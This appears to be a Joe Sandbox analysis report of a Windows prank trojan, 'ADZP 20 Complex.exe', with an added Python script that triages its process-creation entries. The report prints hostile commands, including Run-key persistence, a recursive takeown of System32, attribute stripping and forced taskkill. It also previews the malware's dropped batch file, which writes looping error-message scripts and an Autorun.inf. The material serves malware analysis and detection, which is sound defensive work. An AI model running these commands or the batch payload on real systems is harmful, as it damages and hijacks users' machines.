Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Thread sleep count: Count: 2832 delay: -10
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Thread sleep count: Count: 2622 delay: -10
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Thread sleep count: Count: 1711 delay: -10
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Thread sleep count: Count: 2488 delay: -10
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe File opened: C:\Users\user\
Source: C:\Windows\System32\mspaint.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_0040ADD6
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 0_2_00409FD0 SetUnhandledExceptionFilter, 0_2_00409FD0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 0_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 0_2_00409FB0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 30_2_00409FD0 SetUnhandledExceptionFilter, 30_2_00409FD0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 30_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter, 30_2_00409FB0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /release
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown (7 identical entries)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown (128 identical entries)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
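The process-creation entries above are the most actionable part of this report for a detection engineer: a batch chain run from cmd.exe that registers a Run-key value pointing at c:\windows\wimn32.bat, takes recursive ownership of C:\Windows\System32, launches .vbs files from the user's Desktop through wscript.exe, strips file attributes with attrib, releases the DHCP lease and force-kills DiskPart. The block below is an added example, not part of the Joe Sandbox report: it parses lines shaped like the report's own "Source: <parent> Process created: <image> <cmdline>" entries (including the fused "cmd.exeProcess created" form the page shows) and flags those behaviours with a small rule set. The rule names, severities and regular expressions are the author's assumptions; the sample lines are constructed by copying the report's entries.

```python
"""Triage 'Process created' entries from a sandbox behaviour report.
Added example, not part of the Joe Sandbox report; rule names, severities and
regexes are the author's assumptions, the sample lines are copied from it."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Parent and image paths end in ".exe"; the page sometimes fuses "cmd.exeProcess created",
# so no whitespace is required between them. Unresolved entries read "unknown unknown".
LINE_RE = re.compile(
    r"^Source:\s*(?P<parent>.*?\.exe)\s*Process created:\s*"
    r"(?:(?P<image>.*?\.exe)\s+(?P<cmdline>.*)|(?P<raw>.*))$", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run\b", re.I)
TAKEOWN_TARGET_RE = re.compile(r'/f\s+"?([^"]+?)"?(?=\s|$)', re.I)
SCRIPT_ARG_RE = re.compile(
    r'"([^"]+?\.(?:vbs|vbe|js|jse|wsf))"|(\S+\.(?:vbs|vbe|js|jse|wsf))(?=\s|$)', re.I)

@dataclass
class ProcEvent:
    parent: str
    image: Optional[str]  # None when the report shows "unknown"
    cmdline: str

def parse_line(line: str) -> Optional[ProcEvent]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    if m.group("image") is None:
        return ProcEvent(m.group("parent"), None, m.group("raw").strip())
    return ProcEvent(m.group("parent"), m.group("image"), m.group("cmdline").strip())

def _base(path: Optional[str]) -> str:
    return (path or "").rsplit("\\", 1)[-1].lower()

def run_key_persistence(ev: ProcEvent) -> bool:
    # reg add HK..\Software\Microsoft\Windows\CurrentVersion\Run /v <name> /d <payload>
    return (_base(ev.image) == "reg.exe" and re.match(r"reg\s+add\b", ev.cmdline, re.I) is not None
            and RUN_KEY_RE.search(ev.cmdline) is not None)

def recursive_takeown_system_dir(ev: ProcEvent) -> bool:
    # takeown /f "C:\Windows\System32" /r : ownership grab over an OS directory tree
    if _base(ev.image) != "takeown.exe" or not re.search(r"(?:^|\s)/r\b", ev.cmdline, re.I):
        return False
    m = TAKEOWN_TARGET_RE.search(ev.cmdline)
    return bool(m and m.group(1).strip().lower().startswith("c:\\windows"))

def script_host_user_script(ev: ProcEvent) -> bool:
    # wscript/cscript running a script file stored under C:\Users\... (quoted or not)
    if _base(ev.image) not in ("wscript.exe", "cscript.exe"):
        return False
    m = SCRIPT_ARG_RE.search(ev.cmdline)
    return bool(m and "\\users\\" in (m.group(1) or m.group(2)).lower())

def attrib_strip_all(ev: ProcEvent) -> bool:
    # attrib -r -a -s -h *.* : clears read-only/system/hidden on every file in the cwd
    tokens = ev.cmdline.lower().split()
    return _base(ev.image) == "attrib.exe" and "*.*" in tokens and {"-r", "-s", "-h"} <= set(tokens)

RULES: List[Tuple[str, str, Callable[[ProcEvent], bool]]] = [
    ("run_key_persistence", "high", run_key_persistence),
    ("recursive_takeown_system_dir", "high", recursive_takeown_system_dir),
    ("script_host_user_script", "medium", script_host_user_script),
    ("attrib_strip_all", "medium", attrib_strip_all),
    ("ipconfig_release", "medium",
     lambda ev: _base(ev.image) == "ipconfig.exe" and "/release" in ev.cmdline.lower()),
    ("forced_taskkill", "low",
     lambda ev: _base(ev.image) == "taskkill.exe" and re.search(r"(?:^|\s)/f\b", ev.cmdline, re.I) is not None),
]
SEVERITY_ORDER = ("none", "low", "medium", "high")

def triage(lines: List[str]) -> Dict[str, object]:
    hits: Dict[str, List[str]] = {name: [] for name, _, _ in RULES}
    unresolved, top = 0, "none"
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev.image is None:
            unresolved += 1
            continue
        for name, sev, pred in RULES:
            if pred(ev):
                hits[name].append(ev.cmdline)
                if SEVERITY_ORDER.index(sev) > SEVERITY_ORDER.index(top):
                    top = sev
    return {"hits": hits, "unresolved": unresolved, "top_severity": top}

# Constructed sample: copied from the report's "Process created" entries; the
# first keeps the fused "cmd.exeProcess created" exactly as the page shows it.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /release",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\notepad.exe notepad",
    r"Source: C:\Windows\System32\cmd.exe Process created: unknown unknown",
]
```

Calling triage(SAMPLE_LINES) on the constructed lines returns two run_key_persistence hits (the HKLM and HKCU values both pointing at c:\windows\wimn32.bat), one recursive takeown on C:\Windows\System32, one wscript hit for Informacion.vbs, one hit each for the attrib, ipconfig /release and taskkill /f lines, one unresolved entry and a top severity of high; the notepad launch matches nothing. The same parser runs unchanged over the report's 128 "unknown unknown" entries, which only raise the unresolved counter, a reminder that a sandbox losing track of that many children is itself worth a second look at the batch chain.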
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation (5 identical entries)
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformation (14 identical entries)
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe Code function: 0_2_00405573 GetVersionExW,GetVersionExW, 0_2_00405573
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (a number before a technique name is the count shown in the report for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 112 Scripting | 1 Replication Through Removable Media | 1 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 21 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 112 Scripting | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Modify Registry | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 Peripheral Device Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 15 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior graph (an image in the original report; its legend distinguished process, signature, created-file and DNS/IP nodes, dropped files, Windows processes, badges for the number of created registry values and created files, the implementation language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious nodes and Internet access). The node and edge labels extracted from the image, written out as a process tree; numbers after a process name are the badges printed next to that node:

Behavior Graph ID: 1428362 | Sample: ADZP 20 Complex.exe | Start date: 18/04/2024 | Architecture: WINDOWS | Score: 58
Root signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 7 other signatures

Root
  started: ADZP 20 Complex.exe (node 8, badge 8); Calculator.exe (node 11)
ADZP 20 Complex.exe (node 8)
  dropped: C:\Users\user\AppData\Local\Temp\...\9B6A.bat (Unicode)
  started: cmd.exe (node 13, badges 3 and 35); conhost.exe (node 17)
cmd.exe (node 13)
  dropped: C:\Windows\System32\Twain_20.dll (PE32); C:\Users\user\Desktop\Twain_20.dll (PE32); C:\Users\user\Desktop\Informacion.vbs (ASCII); 2 other malicious files
  signatures: Command shell drops VBS files; Uses cmd line tools excessively to alter registry or file data; Uses ipconfig to lookup or modify the Windows network settings; Sample is not signed and drops a device driver
  started: ADZP 20 Complex.exe (nodes 19, 22 and 24); 33 other processes (node 26)
ADZP 20 Complex.exe (node 19)
  dropped: C:\Users\user\AppData\Local\Temp\...\B134.bat (Unicode)
  started: conhost.exe (node 28); cmd.exe (node 30)
ADZP 20 Complex.exe (node 22)
  dropped: C:\Users\user\AppData\Local\Temp\...\B53B.bat (Unicode)
  started: conhost.exe (node 32); cmd.exe (node 34)
ADZP 20 Complex.exe (node 24)
  dropped: C:\Users\user\AppData\Local\Temp\...\BE05.bat (Unicode)
  started: 2 other processes (node 44)
33 other processes (node 26)
  started: takeown.exe (node 36, badge 1); conhost.exe (nodes 38, 40 and 42)

Antivirus and machine-learning detection

Initial sample
Source | Detection | Scanner | Label
ADZP 20 Complex.exe | 63% | ReversingLabs | Win32.Trojan.Casdet
ADZP 20 Complex.exe | 100% | Avira | TR/AD.BatBadJoke.javlp
ADZP 20 Complex.exe | 100% | Joe Sandbox ML | -

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat | 100% | Avira | BAT/Agent.RAA
C:\Users\user\Desktop\Twain_20.dll | 100% | Avira | TR/AD.BatBadJoke.javlp
C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat | 100% | Avira | BAT/Agent.RAA
C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat | 100% | Avira | BAT/Agent.RAA
C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat | 100% | Avira | BAT/Agent.RAA
C:\Users\user\Desktop\Twain_20.dll | 100% | Joe Sandbox ML | -
C:\Users\user\Desktop\Twain_20.dll | 63% | ReversingLabs | Win32.Trojan.Casdet
C:\Windows\System32\Twain_20.dll | 63% | ReversingLabs | Win32.Trojan.Casdet

Unpacked PE files, domains and URLs: no antivirus matches.
Contacted domains: none recorded.
Contacted IPs: none recorded.
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1428362
                  Start date and time:2024-04-18 21:22:13 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:89
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:ADZP 20 Complex.exe
                  Detection:MAL
                  Classification:mal58.troj.winEXE@294/17@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 54
                  • Number of non-executed functions: 92
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtFsControlFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • VT rate limit hit for: ADZP 20 Complex.exe
Time | Type | Description
21:23:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Twain_20 C:\Users\user\AppData\Local\Temp\Twain_20.cmd
21:23:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Twain_20 C:\Users\user\AppData\Local\Temp\Twain_20.cmd
Context (IPs, domains, ASNs, JA3 fingerprints, dropped files): no context available for any of them.
                  Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
                  Category:dropped
                  Size (bytes):17630
                  Entropy (8bit):4.672657117908346
                  Encrypted:false
                  SSDEEP:192:Kn0iMJWap3ahz9j3E301VaYYATCdhSouXKN:PJWo3yzHVbYMW
                  MD5:190E7CFA7D6DE532BA4498CA3D38B47D
                  SHA1:7D4EA5CE61962C0445D955A44DD31226FA8C736E
                  SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
                  SHA-512:5A87B4BAC67957ACBC6DFAB08CF9B3E1110E4B496B66110A44F7B2D0EC75B950D7569B6220C4A5AB3597DB032E70B16D5A5E6EE4AB23102F6D12FEA7BDC11598
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
Preview (the report prints CRLF as `..`; expanded here to one command per line, the preview is cut by the sandbox at the end; Spanish strings: "Error Critico" = "Critical Error", "Error en El Sistema" = "Error in the System", "Has Sido Hackeado!" = "You have been hacked!"):
  @shift /0
  @echo off
  title ADZP 20 Complex
  goto Phase-1
  :Phase-1
  echo off>>ErrorCritico.vbs
  echo do>>ErrorCritico.vbs
  echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs
  echo loop>>ErrorCritico.vbs
  echo off>>Advertencia.vbs
  echo do>>Advertencia.vbs
  echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs
  echo loop>>Advertencia.vbs
  echo off>>Informacion.vbs
  echo do>>Informacion.vbs
  echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs
  echo loop>>Informacion.vbs
  echo off>>Autorun.inf
  echo [AutoRun]>>Autorun.inf
  echo Open=ADZP 20 Complex>>Autorun.inf
  echo Action=Start ADZP 20 Complex>>Autorun.inf
  echo Label=???>>Autorun.inf
  echo off>>Taskse.exe
  echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand
The same batch file (identical size, hashes and preview) was dropped three more times, once by each re-executed ADZP 20 Complex.exe instance (B134.bat, B53B.bat and BE05.bat in the detection table and the behavior graph); the three duplicate entries are collapsed here.
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):39
                  Entropy (8bit):4.599379462396518
                  Encrypted:false
                  SSDEEP:3:FJut1evM/vn:FJOevuvn
                  MD5:BC987A29D1417F4BF9ED17152376BABE
                  SHA1:EDF76EA21860C46436E7897588D087620F361EF0
                  SHA-256:D4F0728CE337A4FC3F0B53E87FF51F8C9B76BA13E935F3CA1CE1B9DE3A7C2B7F
                  SHA-512:3DC29B489BBEE251BFA4110DD13E51EAAEF4988F9909E58581C87BA8CBA1D06989FA01E61C6FD01D07241560E4BE5A45512C2E01C3E649838048F9376C96157E
                  Malicious:false
Preview (CRLF expanded):
  call C:\Windows\System32\Twain_20.dll
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):236
                  Entropy (8bit):4.560600430104363
                  Encrypted:false
                  SSDEEP:6:PiVF6RNFwcHeiVF6RNFwcHeiVF6RNFwcHu2F6RNFwcHu:A6PH76PH76PHuE6PHu
                  MD5:58E27B22E870ABEAF07364D349E31472
                  SHA1:288A6FCD9EF6E1404DD35DDB6B622A4DF263E010
                  SHA-256:29E0DAF34E3D5364119B7BC5F7D4E860BBB3E3B6DE14F5ACE3653F36326D4544
                  SHA-512:503E0679E050311F5D60692AFB2349E1D0C8A5EFDE74B3CDBFF8BD9D5E37CEB45DD77D1973FBA8F675D3CA76622D9D0A6FD4E1F54D0091BD15362B66D11469BD
                  Malicious:true
Preview (CRLF expanded; as captured, the lines are repeated and out of order, consistent with the four sample instances appending to the same file with >>):
  do
  Mensaje=msgbox("Error en El Sistema",48,"Error")
  loop
  do
  Mensaje=msgbox("Error en El Sistema",48,"Error")
  loop
  do
  Mensaje=msgbox("Error en El Sistema",48,"Error")
  loop
  Mensaje=msgbox("Error en El Sistema",48,"Error")
  loop
                  Process:C:\Windows\System32\cmd.exe
                  File Type:Microsoft Windows Autorun file
                  Category:dropped
                  Size (bytes):274
                  Entropy (8bit):4.816492330474297
                  Encrypted:false
                  SSDEEP:6:y1t+3sebc3qc1t+3sebc3qhRn1t+3sebc3qYebc3qx:irQqrQvrrQqQP
                  MD5:C66004DB9B30431954B791CE903BE57F
                  SHA1:5940B6B4BCF84697546FC05C16F5D11AFBEA2674
                  SHA-256:CEDBECD3BD6E98098A58A7A2FC74FD9CADD00D8B21E971A8854A1DE238BBFB7D
                  SHA-512:C4E8F419549A4948E18DDEC17B39889F7AFEA77C93C2E9EEE40A986E390D651460B1300820A6BA31DDA33827B6FB7F3E8A8F8612BACA68F46125075B3BC2E854
                  Malicious:false
Preview (CRLF expanded; repeated sections as captured, from several appending instances):
  [AutoRun]
  Open=ADZP 20 Complex
  Action=Start ADZP 20 Complex
  Label=???
  [AutoRun]
  Open=ADZP 20 Complex
  Action=Start ADZP 20 Complex
  Label=???
  [AutoRun]
  [AutoRun]
  Open=ADZP 20 Complex
  Action=Start ADZP 20 Complex
  Label=???
  Action=Start ADZP 20 Complex
  Label=???
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):216
                  Entropy (8bit):4.517614466735074
                  Encrypted:false
                  SSDEEP:6:PiVF6RUJSAsHeiVF6RUJSAsHeiVF6RUJSAsHpiVF6RUJSAsHl:A69rH769rH769rH669rHl
                  MD5:A7FD2AE308F97377C696EC4C4EAD9416
                  SHA1:5803FC88CC7B489589185001CA1439F292A2983A
                  SHA-256:08BC521E2869E0A3ED6D5E2375B5D5C106D2B9E127C19D4F3A578770B4D49431
                  SHA-512:E6B5CD05F086B31F45C0677D057185334CBC68CCD18FEE913FB0023386C04D12F716671F01B1404A73038C3EFB829DC112FA63F39C7883807FB882A98E21EC5D
                  Malicious:true
Preview (CRLF expanded; line order as captured):
  do
  Mensaje=msgbox("Error Critico",16,"Error")
  loop
  do
